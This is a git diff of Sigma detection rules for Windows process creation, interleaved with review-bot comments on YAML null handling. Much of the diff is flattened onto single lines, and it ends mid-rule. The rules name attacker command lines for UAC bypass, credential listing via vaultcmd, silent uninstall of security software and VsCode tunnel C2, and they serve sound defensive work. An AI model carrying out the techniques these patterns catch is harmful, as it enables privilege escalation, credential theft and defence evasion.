 ParentImage|endswith: \AppData\Local\Temp\pkgmgr.exe
- CommandLine: '"C:\Windows\system32\msconfig.exe" -5'
+ CommandLine: '"C:\Windows\system32\msconfig.exe" -5'
 condition: process_creation and selection
 falsepositives:
 - Unknown
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml
index b0dc79918..16bd587e1 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Using NTFS Reparse Point - Process
 id: 39ed3c80-e6a1-431b-9df3-911ac53d08a7
 status: test
-description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe
- DLL hijacking (UACMe 36)
+description: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
@@ -21,18 +20,17 @@ detection:
 EventID: 1
 Channel: Microsoft-Windows-Sysmon/Operational
 selection1:
- CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\'
- CommandLine|endswith: \AppData\Local\Temp\update.msu
+ CommandLine|startswith: '"C:\Windows\system32\wusa.exe" /quiet C:\Users\'
+ CommandLine|endswith: \AppData\Local\Temp\update.msu
 IntegrityLevel:
 - High
 - System
 selection2:
- ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart
- /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck'
+ ParentCommandLine: '"C:\Windows\system32\dism.exe" /online /quiet /norestart /add-package /packagepath:"C:\Windows\system32\pe386" /ignorecheck'
 IntegrityLevel:
 - High
 - System
- CommandLine|contains|all:
+ CommandLine|contains|all:
 - C:\Users\
 - \AppData\Local\Temp\
 - \dismhost.exe {
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml
index a818c0f19..a3eee676f 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml
@@ -1,8 +1,7 @@
 title: UAC Bypass Using PkgMgr and DISM
 id: a743ceba-c771-4d75-97eb-8a90f7f4844c
 status: test
-description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe
- 23)
+description: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)
 references:
 - https://github.com/hfiref0x/UACME
 author: Christian Burkard (Nextron Systems)
diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml
index c3a758aac..e1f0bbeee 100644
--- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml
+++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_sdclt.yml
@@ -1,8 +1,7 @@ title: Potential UAC Bypass Via Sdclt.EXE id: 40f9af16-589d-4984-b78d-8c2aec023197 status: test -description: A General detection for sdclt being spawned as an elevated process. This - could be an indicator of sdclt being used for bypass UAC techniques. +description: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques. references: - https://github.com/OTRF/detection-hackathon-apt29/issues/6 - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml index 307eece20..025c93e26 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_winsat.yml @@ -1,8 +1,7 @@ title: UAC Bypass Abusing Winsat Path Parsing - Process id: 7a01183d-71a2-46ad-ad5c-acd989ac1793 status: test -description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe - (UACMe 52) +description: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml index 50493521a..6ed8b5bb5 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wmp.yml 
@@ -1,8 +1,7 @@ title: UAC Bypass Using Windows Media Player - Process id: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2 status: test -description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll - (UACMe 32) +description: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32) references: - https://github.com/hfiref0x/UACME author: Christian Burkard (Nextron Systems) @@ -27,8 +26,7 @@ detection: - System selection2: Image: C:\Windows\System32\cmd.exe - ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" - /s' + ParentCommandLine: '"C:\Windows\system32\mmc.exe" "C:\Windows\system32\eventvwr.msc" /s' IntegrityLevel: - High - System diff --git a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml index 6c009ce3a..5d96e75e6 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uac_bypass_wsreset.yml 
@@ -1,18 +1,16 @@ title: Bypass UAC via WSReset.exe id: d797268e-28a9-49a7-b9a8-2f5039011c5c related: - - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae - type: obsoletes + - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae + type: obsoletes status: test -description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries - use this technique to execute privileged processes. +description: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes. references: - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/ - https://www.activecyber.us/activelabs/windows-uac-bypass - https://twitter.com/ReaQta/status/1222548288731217921 -author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, - Florian Roth +author: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth date: 2019/10/24 modified: 2022/05/13 tags: @@ -30,8 +28,8 @@ detection: selection: ParentImage|endswith: \wsreset.exe filter: - - Image|endswith: \conhost.exe - - OriginalFileName: CONHOST.EXE + - Image|endswith: \conhost.exe + - OriginalFileName: CONHOST.EXE condition: process_creation and (selection and not filter) falsepositives: - Unknown sub processes of Wsreset.exe diff --git a/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml b/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml index b5a34f668..8b0a28999 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ultravnc.yml 
@@ -1,9 +1,7 @@ title: Use of UltraVNC Remote Access Software id: 145322e4-0fd3-486b-81ca-9addc75736d8 status: test -description: An adversary may use legitimate desktop support and remote access software,to - establish an interactive command and control channel to target systems within - networks +description: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks references: - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md author: frack113 @@ -20,10 +18,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - - Description: VNCViewer - - Product: UltraVNC VNCViewer - - Company: UltraVNC - - OriginalFileName: VNCViewer.exe + - Description: VNCViewer + - Product: UltraVNC VNCViewer + - Company: UltraVNC + - OriginalFileName: VNCViewer.exe condition: process_creation and selection falsepositives: - Legitimate use diff --git a/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml index 5a23b7e30..ba764010e 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_ultravnc_susp_execution.yml 
@@ -1,9 +1,7 @@ title: Suspicious UltraVNC Execution id: 871b9555-69ca-4993-99d3-35a59f9f3599 status: test -description: Detects suspicious UltraVNC command line flag combination that indicate - a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon - threat group) +description: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group) references: - https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine @@ -25,7 +23,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - '-autoreconnect ' - '-connect ' - '-id:' diff --git a/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml b/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml index 548afec8c..ba2d8cf1f 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml @@ -1,8 +1,7 @@ title: Uninstall Crowdstrike Falcon Sensor id: f0f7be61-9cf5-43be-9836-99d6ef448a18 status: test -description: Adversaries may disable security tools to avoid possible detection of - their tools and activities by uninstalling Crowdstrike Falcon +description: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md author: frack113 
@@ -20,13 +19,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - \WindowsSensor.exe - ' /uninstall' - ' /quiet' condition: process_creation and selection falsepositives: - - Administrator might leverage the same command line for debugging or other purposes. - However this action must be always investigated + - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml b/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml index af0d3cc7b..e89ab1281 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml @@ -1,11 +1,10 @@ title: Uncommon Userinit Child Process id: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458 related: - - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 - type: similar + - id: 21d856f9-9281-4ded-9377-51a1a6e2a432 + type: similar status: test -description: Detects uncommon "userinit.exe" child processes, which could be a sign - of uncommon shells or login scripts used for persistence. +description: Detects uncommon "userinit.exe" child processes, which could be a sign of uncommon shells or login scripts used for persistence. references: - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html - https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core 
@@ -28,29 +27,30 @@ detection: filter_main_explorer: Image|endswith: :\WINDOWS\explorer.exe filter_optional_logonscripts: - CommandLine|contains: + CommandLine|contains: - netlogon.bat - UsrLogon.cmd filter_optional_windows_core: - CommandLine: PowerShell.exe + # Note: This filter is mandatory on Windows Core machines as the default shell spawned by "userinit" is "powershell.exe". + # https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core + CommandLine: PowerShell.exe filter_optional_proquota: Image|endswith: - :\Windows\System32\proquota.exe - :\Windows\SysWOW64\proquota.exe filter_optional_citrix: Image|endswith: - - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe - - :\Program Files (x86)\Citrix\HDX\bin\icast.exe + # As reported by https://github.com/SigmaHQ/sigma/issues/4569 + - :\Program Files (x86)\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files (x86)\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files (x86)\Citrix\System32\icast.exe - - :\Program Files\Citrix\HDX\bin\cmstart.exe - - :\Program Files\Citrix\HDX\bin\icast.exe + - :\Program Files\Citrix\HDX\bin\cmstart.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command + - :\Program Files\Citrix\HDX\bin\icast.exe # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command - :\Program Files\Citrix\System32\icast.exe filter_optional_image_null: - Image: null - condition: process_creation and (selection and not 1 of filter_main_* and not - 1 of filter_optional_*) + Image: + condition: process_creation and (selection and not 1 of filter_main_* and not 1 of filter_optional_*) falsepositives: - - Legitimate logon scripts or custom shells may trigger false positives. Apply - additional filters accordingly. 
+ - Legitimate logon scripts or custom shells may trigger false positives. Apply additional filters accordingly. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml b/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml index 5c1bafd11..f8410ffb0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vaultcmd_list_creds.yml @@ -1,8 +1,7 @@ title: Windows Credential Manager Access via VaultCmd id: 58f50261-c53b-4c88-bd12-1d71f12eda4c status: test -description: List credentials currently stored in Windows Credential Manager via the - native Windows utility vaultcmd.exe +description: List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.004/T1555.004.md#atomic-test-1---access-saved-credentials-via-vaultcmd author: frack113 @@ -20,10 +19,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VaultCmd.exe - - OriginalFileName: VAULTCMD.EXE + - Image|endswith: \VaultCmd.exe + - OriginalFileName: VAULTCMD.EXE selection_cli: - CommandLine|contains: '/listcreds:' + CommandLine|contains: '/listcreds:' condition: process_creation and (all of selection*) falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml b/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml index ad0bf35e2..7d11c5114 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_verclsid_runs_com.yml 
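Review bot: The `filter_optional_image_null` entry now reads `Image:` with an empty value where it previously read `Image: null`; the two are only equivalent if every consumer resolves an empty plain scalar to null, so for a "field is absent" filter the explicit `Image: null` spelling is the unambiguous one. Separately, `filter_optional_windows_core` exempts on `CommandLine: PowerShell.exe` alone, which also suppresses any custom shell whose command line is exactly that string regardless of where the binary lives; if the Server Core shell is the System32 PowerShell, pairing the filter with `Image|endswith: \WindowsPowerShell\v1.0\powershell.exe` would keep the exemption without widening the gap. The added Citrix source comments are helpful; the `:\Program Files (x86)\Citrix\System32\icast.exe` and `:\Program Files\Citrix\System32\icast.exe` entries could carry the same reference so the whole filter is traceable.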
@@ -21,10 +21,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \verclsid.exe - - OriginalFileName: verclsid.exe + - Image|endswith: \verclsid.exe + - OriginalFileName: verclsid.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - /S - /C condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml index 1ba6b534a..3504185b0 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_execution.yml @@ -1,9 +1,7 @@ title: Detect Virtualbox Driver Installation OR Starting Of VMs id: bab049ca-7471-4828-9024-38279a4c04da status: test -description: Adversaries can carry out malicious operations using a virtual instance - to avoid detection. This rule is built to detect the registration of the Virtualbox - driver or start of a Virtualbox VM. +description: Adversaries can carry out malicious operations using a virtual instance to avoid detection. This rule is built to detect the registration of the Virtualbox driver or start of a Virtualbox VM. references: - https://news.sophos.com/en-us/2020/05/21/ragnar-locker-ransomware-deploys-virtual-machine-to-dodge-security/ - https://threatpost.com/maze-ransomware-ragnar-locker-virtual-machine/159350/ @@ -23,12 +21,12 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_1: - CommandLine|contains: + CommandLine|contains: - VBoxRT.dll,RTR3Init - VBoxC.dll - VBoxDrv.sys selection_2: - CommandLine|contains: + CommandLine|contains: - startvm - controlvm condition: process_creation and (1 of selection_*) 
@@ -38,7 +36,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - This may have false positives on hosts where Virtualbox is legitimately being - used for operations + - This may have false positives on hosts where Virtualbox is legitimately being used for operations level: low ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml index 20ce6df1b..bd58d36fc 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_virtualbox_vboxdrvinst_execution.yml @@ -1,14 +1,10 @@ title: Suspicious VBoxDrvInst.exe Parameters id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 status: test -description: 'Detect VBoxDrvInst.exe run with parameters allowing processing INF file. - +description: | + Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. - - For example one could use this technique to obtain persistence via modifying one - of Run or RunOnce registry keys - - ' + For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys references: - https://github.com/LOLBAS-Project/LOLBAS/blob/4db780e0f0b2e2bb8cb1fa13e09196da9b9f1834/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml - https://twitter.com/pabraeken/status/993497996179492864 @@ -28,7 +24,7 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection: Image|endswith: \VBoxDrvInst.exe - CommandLine|contains|all: + CommandLine|contains|all: - driver - executeinf condition: process_creation and selection 
@@ -38,7 +34,6 @@ fields: - CommandLine - ParentCommandLine falsepositives: - - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation - process + - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml index ce81fee4c..794b9e3f2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence.yml @@ -1,11 +1,10 @@ title: Potential Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d related: - - id: 236d8e89-ed95-4789-a982-36f4643738ba - type: derived + - id: 236d8e89-ed95-4789-a982-36f4643738ba + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://www.hexacorn.com/blog/2017/01/14/beyond-good-ol-run-key-part-53/ @@ -24,10 +23,10 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - Image|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' condition: process_creation and (all of selection_*) 
diff --git a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml index c9c414567..a4e3fc417 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vmware_toolbox_cmd_persistence_susp.yml @@ -1,12 +1,10 @@ title: Suspicious Persistence Via VMwareToolBoxCmd.EXE VM State Change Script id: 236d8e89-ed95-4789-a982-36f4643738ba related: - - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d - type: derived + - id: 7aa4e81a-a65c-4e10-9f81-b200eb229d7d + type: derived status: experimental -description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and - "set" flag to setup a specific script that's located in a potentially suspicious - location to run for a specific VM state +description: Detects execution of the "VMwareToolBoxCmd.exe" with the "script" and "set" flag to setup a specific script that's located in a potentially suspicious location to run for a specific VM state references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ author: Nasreddine Bencherchali (Nextron Systems) @@ -24,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_bin_img: - - Image|endswith: \VMwareToolBoxCmd.exe - - OriginalFileName: toolbox-cmd.exe + - Image|endswith: \VMwareToolBoxCmd.exe + - OriginalFileName: toolbox-cmd.exe selection_bin_cli: - CommandLine|contains|all: + CommandLine|contains|all: - ' script ' - ' set ' selection_susp_paths: - CommandLine|contains: + CommandLine|contains: - :\PerfLogs\ - :\Temp\ - :\Windows\System32\Tasks\ diff --git a/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml b/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml index dba406c06..9fafd88c6 100644 
--- a/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vmware_vmtoolsd_susp_child_process.yml @@ -1,8 +1,7 @@ title: VMToolsd Suspicious Child Process id: 5687f942-867b-4578-ade7-1e341c46e99a status: experimental -description: Detects suspicious child process creations of VMware Tools process which - may indicate persistence setup +description: Detects suspicious child process creations of VMware Tools process which may indicate persistence setup references: - https://bohops.com/2021/10/08/analyzing-and-detecting-a-vmtools-persistence-technique/ - https://user-images.githubusercontent.com/61026070/136518004-b68cce7d-f9b8-4e9a-9b7b-53b1568a9a94.png 
@@ -25,37 +24,37 @@ detection: selection_parent: ParentImage|endswith: \vmtoolsd.exe selection_img: - - Image|endswith: - - \cmd.exe - - \cscript.exe - - \mshta.exe - - \powershell.exe - - \pwsh.exe - - \regsvr32.exe - - \rundll32.exe - - \wscript.exe - - OriginalFileName: - - Cmd.Exe - - cscript.exe - - MSHTA.EXE - - PowerShell.EXE - - pwsh.dll - - REGSVR32.EXE - - RUNDLL32.EXE - - wscript.exe + - Image|endswith: + - \cmd.exe + - \cscript.exe + - \mshta.exe + - \powershell.exe + - \pwsh.exe + - \regsvr32.exe + - \rundll32.exe + - \wscript.exe + - OriginalFileName: + - Cmd.Exe + - cscript.exe + - MSHTA.EXE + - PowerShell.EXE + - pwsh.dll + - REGSVR32.EXE + - RUNDLL32.EXE + - wscript.exe filter_main_vmwaretools_script: Image|endswith: \cmd.exe - CommandLine|contains: + CommandLine|contains: - \VMware\VMware Tools\poweron-vm-default.bat - \VMware\VMware Tools\poweroff-vm-default.bat - \VMware\VMware Tools\resume-vm-default.bat - \VMware\VMware Tools\suspend-vm-default.bat filter_main_empty: Image|endswith: \cmd.exe - CommandLine: '' + CommandLine: '' filter_main_null: Image|endswith: \cmd.exe - CommandLine: null + CommandLine: condition: process_creation and (all of selection* and not 1 of filter_main_*) falsepositives: - Legitimate use by VM administrator diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml index daf0a8bef..9c1084511 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_child_processes_anomalies.yml 
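Review bot: `filter_main_null` changes `CommandLine: null` to `CommandLine:` with an empty value; in YAML an empty plain scalar normally resolves to null, but this relies on the loader rather than stating the intent, and it now differs in form from `filter_main_empty`, which keeps an explicit `''`. Since the two filters exist precisely to tell "no command line recorded" apart from "empty command line", keeping the explicit `CommandLine: null` makes that distinction readable and robust to tooling that treats a bare key differently. A short comment on `filter_main_null` such as `# Field not present in the event (not the same as an empty string)` would help the next maintainer.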
@@ -1,9 +1,7 @@ title: Potentially Suspicious Child Process Of VsCode id: 5a3164f2-b373-4152-93cf-090b13c12d27 status: experimental -description: Detects uncommon or suspicious child processes spawning from a VsCode - "code.exe" process. This could indicate an attempt of persistence via VsCode tasks - or terminal profiles. +description: Detects uncommon or suspicious child processes spawning from a VsCode "code.exe" process. This could indicate an attempt of persistence via VsCode tasks or terminal profiles. references: - https://twitter.com/nas_bench/status/1618021838407495681 - https://twitter.com/nas_bench/status/1618021415852335105 @@ -37,7 +35,7 @@ detection: - \powershell.exe - \pwsh.exe - \cmd.exe - CommandLine|contains: + CommandLine|contains: - Invoke-Expressions - IEX - Invoke-Command @@ -49,13 +47,12 @@ detection: - cscript selection_children_paths: Image|contains: + # Add more suspicious locations - :\Users\Public\ - :\Windows\Temp\ - :\Temp\ condition: process_creation and (selection_parent and 1 of selection_children_*) falsepositives: - - In development environment where VsCode is used heavily. False positives may - occur when developers use task to compile or execute different types of code. - Remove or add processes accordingly + - In development environment where VsCode is used heavily. False positives may occur when developers use task to compile or execute different types of code. Remove or add processes accordingly level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml index 22f4e4fcf..05f59efed 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_execution.yml 
@@ -1,8 +1,7 @@ title: Visual Studio Code Tunnel Execution id: 90d6bd71-dffb-4989-8d86-a827fedd6624 status: experimental -description: Detects Visual Studio Code tunnel execution. Attackers can abuse this - functionality to establish a C2 channel +description: Detects Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -21,17 +20,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_only_tunnel: - OriginalFileName: null - CommandLine|endswith: .exe tunnel + OriginalFileName: + CommandLine|endswith: .exe tunnel selection_tunnel_args: - CommandLine|contains|all: + CommandLine|contains|all: - .exe tunnel - '--name ' - --accept-server-license-terms selection_parent_tunnel: ParentCommandLine|endswith: ' tunnel' Image|endswith: \cmd.exe - CommandLine|contains|all: + CommandLine|contains|all: - '/d /c ' - \servers\Stable- - code-server.cmd diff --git a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml index 7386d97d4..dead7a837 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml 
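Review bot: In `selection_only_tunnel` the `OriginalFileName: null` test becomes `OriginalFileName:` with no value; the selection is meant to catch a tunnel launch whose image lacks version info, so the "field absent" semantics matter and the explicit `null` form is the clearer and more portable way to express it. The same change appears in `selection_image_only_tunnel` of the renamed-execution rule further down and deserves the same treatment. A one-line comment, e.g. `# Image without version info (OriginalFileName not populated)`, would document why the null check is part of the detection.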
@@ -1,9 +1,7 @@ title: Visual Studio Code Tunnel Shell Execution id: f4a623c2-4ef5-4c33-b811-0642f702c9f1 status: experimental -description: Detects the execution of a shell (powershell, bash, wsl...) via Visual - Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel - and execute arbitrary commands on the system. +description: Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system. references: - https://ipfyx.fr/post/visual-studio-code-tunnel/ - https://badoption.eu/blog/2023/01/31/code_c2.html @@ -24,12 +22,13 @@ detection: selection_parent: ParentImage|contains: \servers\Stable- ParentImage|endswith: \server\node.exe - ParentCommandLine|contains: .vscode-server + ParentCommandLine|contains: .vscode-server # Technically one can host its own local server instead of using the VsCode one. And that would probably change the name (requires further research) + # Note: Child processes (ie: shells) can be whatever technically (with some efforts) selection_child_1: Image|endswith: - \powershell.exe - \pwsh.exe - CommandLine|contains: \terminal\browser\media\shellIntegration.ps1 + CommandLine|contains: 